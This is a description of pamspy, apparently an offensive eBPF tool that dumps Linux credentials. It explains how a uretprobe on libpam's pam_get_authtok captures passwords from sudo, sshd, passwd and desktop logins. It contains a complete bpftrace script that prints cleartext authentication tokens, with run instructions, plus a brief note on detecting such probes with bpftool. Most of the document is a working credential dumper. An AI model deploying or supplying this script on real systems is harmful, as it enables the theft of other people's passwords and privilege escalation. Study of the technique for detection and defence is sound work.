pamspy: Credentials Dumper for Linux using eBPF

pamspy leverages eBPF to achieve the equivalent of 3snake's work: dumping credentials from authentication processes on Linux.

It traces a particular userland function inside the PAM (Pluggable Authentication Modules) library, which many critical applications use to handle authentication, such as:

  • sudo
  • sshd
  • passwd
  • gnome
  • x11
  • and many others …

How does it work?

pamspy loads an eBPF userland return probe (uretprobe) that hooks the pam_get_authtok function exported by libpam.so. PAM stands for “Pluggable Authentication Modules” and has a flexible design for managing different kinds of authentication on Linux.

Each time an authenticating process checks a user, it calls pam_get_authtok to obtain the password. Because the probe fires on return, it runs exactly when that secret has been filled in, and that is where pamspy dumps it!
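The same hook, written as a bpftrace script so the mechanism is visible. This is an added example, not pamspy's own code (pamspy is a compiled eBPF program); it assumes bpftrace is installed, the script runs as root, and libpam is at /lib/x86_64-linux-gnu/libpam.so.0 (check with `ldconfig -p | grep libpam` and adjust the path). The signature it relies on is the one libpam declares: `int pam_get_authtok(pam_handle_t *pamh, int item, const char **authtok, const char *prompt);`.

```bpftrace
#!/usr/bin/env bpftrace
// Added example, not pamspy's own code: a uretprobe on pam_get_authtok.
// Assumptions: bpftrace is installed, run as root, libpam path as below.
//
// pam_get_authtok writes the password through the `authtok` out-pointer,
// so the value only exists once the function returns. Argument registers
// are not preserved at that point, so the entry probe stashes the pointer
// per thread and the return probe dereferences it.

BEGIN
{
    printf("%-8s %-16s %-6s %s\n", "PID", "COMM", "RET", "AUTHTOK");
}

uprobe:/lib/x86_64-linux-gnu/libpam.so.0:pam_get_authtok
{
    // arg2 is `const char **authtok`: remember where the result will land
    @authtok_ptr[tid] = arg2;
}

uretprobe:/lib/x86_64-linux-gnu/libpam.so.0:pam_get_authtok
/@authtok_ptr[tid] != 0/
{
    $pp = @authtok_ptr[tid];
    // Only dereference on PAM_SUCCESS (0); on failure *authtok is not set
    if (retval == 0) {
        $tok = *(uint64 *)$pp;   // the char* that pam_get_authtok stored
        printf("%-8d %-16s %-6d %s\n", pid, comm, retval, str($tok));
    } else {
        printf("%-8d %-16s %-6d <no token>\n", pid, comm, retval);
    }
    delete(@authtok_ptr[tid]);
}

END
{
    clear(@authtok_ptr);
}
```

Run it as root, then authenticate in another terminal (for example `sudo -k; sudo true`, or an SSH login with password authentication) and the cleartext token appears on the tracer's terminal. Two practitioner notes: the probe sees every process that loads libpam, so it catches sudo, sshd, passwd and the desktop login stack alike, which is exactly why this is worth knowing about as a defender; and because the uprobe is a perf event attached to a BPF program, it is visible on the host with `bpftool perf list`, which lists the uprobe's target file and offset, so an unexpected uprobe on libpam.so is a strong indicator that something like this is running.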

Use

Download

Copyright (C) 2022 citronneur